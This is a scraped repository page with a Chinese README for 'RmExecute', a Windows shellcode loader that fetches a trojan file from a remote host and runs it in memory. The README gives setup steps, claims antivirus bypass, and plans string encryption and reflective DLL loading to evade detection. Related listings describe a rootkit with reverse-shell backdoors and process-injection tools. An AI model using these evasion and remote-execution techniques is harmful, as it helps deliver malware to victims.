Remote Download and Memory Execute for shellcode framework

Related tags

Utilities RmExecute
Overview

RmExecute

Remote Download and Memory Execute for shellcode framework

远程下载并内存加载的ShellCode框架,暂不支持X64

参(抄)考(袭)项目

windows下shellcode提取模板的实现

主要抄袭来源,直接使用这位大佬的shellcode框架,并且强烈推荐看下他文章内的doc,分析的非常好

PIC_Bindshell

windows api hashing部分直接搬过来的

ReflectiveDLLInjection

准备抄袭

开(犯)发(罪)过程

效果图

bypassAV

How to use

开箱即用

修改ShellCode.cpp->StartSCode函数中的host和path改为您的域名和木马文件即可,之后使用Release模式运行,即会在目录下生成123.bin文件,之后使用EXE_RUN_MT模式编译运行即可加载123.bin文件

或是自行调用123.bin文件

添加API

使用目录下的Get-FunctionsHash.ps1脚本添加API HASH到hash.h

计算HASH

之后在API.H中添加相关WINAPI 函数指针,作为搜索地址后调用的方式,之后在API.H->FUNCTIONS结构体中添加相关成员

之后在Tool.h->RmExecute::Initfunctions函数中调用

char szUser32[] = { 'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 };
pfn->fnLoadLibraryA(szUser32);
pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA);

搜索函数来加载WINAPI。

之后就可以使用 fn.fnMessageBox(0, "text", "text", MB_OK);这样形式来调用winapi了。

字符串相关

参考第一个引用的文章链接,字符串必须要使用{'a','b','\0'};这样子的立即数形式

进阶 (很快)

使用XOR加密字符串

隐藏loadlibrary特征和url特征,更不容易被发现

X64支持

自行调试Tool.h->RunPortableExecutable函数,大概就是加个X64宏把EAX什么换成RAX(应该

反射DLL加载技术

完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化

纯shellcode加载

太奢侈了我就是想想

Owner
一个垃圾制造者。代码搬运家。
null
Hijack Printconfig.dll to execute shellcode

printjacker Printjacker is a post-exploitation tool that creates a persistence mechanism by overwriting Printconfig.dll with a shellcode injector. The

Red Section 82 Jun 10, 2022
Compile and execute C "scripts" in one go!

c "There isn't much that's special about C. That's one of the reasons why it's fast." I love C for its raw speed (although it does have its drawbacks)

Ryan Jacobs 1.9k Jun 17, 2022
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 77 Jul 3, 2022
POCs for Shellcode Injection via Callbacks

Callback_Shellcode_Injection POCs for Shellcode Injection via Callbacks. Working APIs 1, EnumTimeFormatsA Works 2, EnumWindows Works 3, EnumD

Chaitanya Haritash 297 Jun 21, 2022
Beacon Object File (BOF) for remote process injection via thread hijacking

cThreadHijack ___________.__ .______ ___ .__ __ __ ___\__ ___/| |_________ ____ _____

Connor McGarr 137 Jun 15, 2022
runsc loads 32/64 bit shellcode (depending on how runsc is compiled) in a way that makes it easy to load in a debugger. This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras.

runsc This code is based on the code from https://github.com/Kdr0x/Kd_Shellcode_Loader by Gary "kd" Contreras and contains additional functionality. T

null 23 Jun 15, 2022
Sqrt OS is a simulation of an OS scheduler and memory manager using different scheduling algorithms including Highest Priority First (non-preemptive), Shortest Remaining Time Next, and Round Robin.

A CPU scheduler determines an order for the execution of its scheduled processes; it decides which process will run according to a certain data structure that keeps track of the processes in the system and their status. A process, upon creation, has one of the three states: Running, Ready, Blocked (doing I/O, using other resources than CPU or waiting on unavailable resource).

Abdallah Hemdan 18 Apr 15, 2022
PoC memory injection detection agent based on ETW, for offensive and defensive research purposes

TiEtwAgent - ETW-based process injection detection This project was created to research, build and test different memory injection detection use cases

Filip Olszak 135 Jun 17, 2022
Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

hasherezade 1.4k Jun 24, 2022
A fast image processing library with low memory needs.

libvips : an image processing library Introduction libvips is a demand-driven, horizontally threaded image processing library. Compared to similar lib

libvips 6.7k Jul 1, 2022
Bytehound - a memory profiler for Linux

Bytehound - a memory profiler for Linux Features Can be used to analyze memory leaks, see where exactly the memory is being consumed, identify tempora

Koute 2.8k Jun 26, 2022
Windows kernel hacking framework, driver template, hypervisor and API written on C++

Windows kernel hacking framework, driver template, hypervisor and API written on C++

Александр 1.2k Jun 29, 2022
Edf is an event-driven framework for embedded system (e.g. FreeRTOS) with state machine and subscriber-publisher pattern.

Edf means event-driven framework. Event-driven programming is a common pattern in embedded systems. However, if you develop software directly on top o

Arrow89 5 Apr 21, 2022
C Application Framework

Caffeine, C Application Framework Caffeine is a C language based framework which uses C99, POSIX and SUSv3 standards, and system specific system calls

Daniel Molina Wegener 101 Jun 7, 2022
A protocol framework for ZeroMQ

zproto - a protocol framework for ZeroMQ Contents Man Page The Codec Generator The Server Generator Quick Background The State Machine Model The zprot

The ZeroMQ project 221 May 3, 2022
CommonMark parsing and rendering library and program in C

cmark cmark is the C reference implementation of CommonMark, a rationalized version of Markdown syntax with a spec. (For the JavaScript reference impl

CommonMark 1.3k Jun 25, 2022
libcurses and dependencies taken from netbsd and brought into a portable shape (at least to musl or glibc)

netbsd-libcurses portable edition this is a port of netbsd's curses library for usage on Linux systems (tested and developed on sabotage linux, based

null 119 Jun 19, 2022
The lightweight and modern Map SDK for Android and iOS

Open Mobile Maps The lightweight and modern Map SDK for Android (6.0+) and iOS (10+) openmobilemaps.io Getting started Readme Android Readme iOS Featu

Open Mobile Maps 90 Jun 13, 2022
Indexes points and lines and generates map tiles to display them

Datamaps This is a tool for indexing large lists of geographic points or lines and dynamically generating map tiles from the index for display. Depend

Eric Fischer 328 Jun 16, 2022